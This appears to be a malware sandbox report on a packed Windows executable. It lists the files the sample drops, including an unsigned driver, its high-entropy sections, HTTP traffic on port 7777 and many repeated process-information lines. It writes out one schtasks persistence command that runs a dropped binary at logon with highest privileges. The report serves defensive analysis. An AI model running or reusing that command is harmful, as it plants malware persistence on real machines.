                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BC49B push esp; retf 0000h0_3_026BC49C
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C1498 push ebp; ret 0_3_026C14A0
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BD161 push edi; iretd 0_3_026BD163
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BD1D3 push cs; retf 0_3_026BD1DB
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BF1B4 push ecx; iretd 0_3_026BF1C3
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C4980 push ecx; retf 0_3_026C4981
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C2591 push edx; ret 0_3_026C259D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_05644650 push esp; iretd 1_2_0564465D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_0564460E push es; ret 1_2_05644610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_05643C58 push esp; iretd 1_2_05643C91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_05643C92 push esp; iretd 1_2_05643C91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_05645F40 push es; ret 1_2_05645F50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F7D30 push eax; retn 0009h9_2_097F7D32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F7E69 push eax; retn 0009h9_2_097F7E6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F8110 push edx; retn 0009h9_2_097F8112
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F8091 push ecx; retn 0009h9_2_097F8092
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F82F1 push edx; retn 0009h9_2_097F82F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F3571 push ds; retn 0009h9_2_097F3572
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F8570 push ebx; retn 0009h9_2_097F857A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F3541 push ds; retn 0009h9_2_097F3542
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F3590 push ds; retn 0009h9_2_097F3592
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F97D8 push ecx; ret 9_2_097F97E5
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00623B00 push rax; retf 10_2_00623B01
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00623BFF push rax; iretd 10_2_00623C01
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_006238C0 push rax; retn 0009h10_2_006238C1
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00623AB7 push rax; retf 0009h10_2_00623AC1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00409B00 push rax; retf 22_2_00409B01
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name: .loHdXUK
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name: .adata
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name: .2w140TT
                  Source: sistem.exe.1.drStatic PE information: section name: .adata
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: real checksum: 0x378b16 should be: 0x37c3ee
                  Source: sistem.exe.1.drStatic PE information: real checksum: 0x374485 should be: 0x363658
                  Source: initial sampleStatic PE information: section name: entropy: 7.99714150919
                  Source: initial sampleStatic PE information: section name: entropy: 7.89828462596
                  Source: initial sampleStatic PE information: section name: entropy: 7.99330469272
                  Source: initial sampleStatic PE information: section name: entropy: 7.78378163159
                  Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22431447957
                  Source: initial sampleStatic PE information: section name: .loHdXUK entropy: 7.91937517669
                  Source: initial sampleStatic PE information: section name: entropy: 7.99376649228
                  Source: initial sampleStatic PE information: section name: entropy: 7.99416148233
                  Source: initial sampleStatic PE information: section name: entropy: 7.79638828934
                  Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.95896631222
                  Source: initial sampleStatic PE information: section name: .2w140TT entropy: 7.91810923308

                  Persistence and Installation Behavior:

                  barindex
                  Sample is not signed and drops a device driverShow sources
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\Microsoft.exeJump to dropped file
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\sistem.exeJump to dropped file
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\services64.exeJump to dropped file
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Uses known network protocols on non-standard portsShow sources
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49779
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
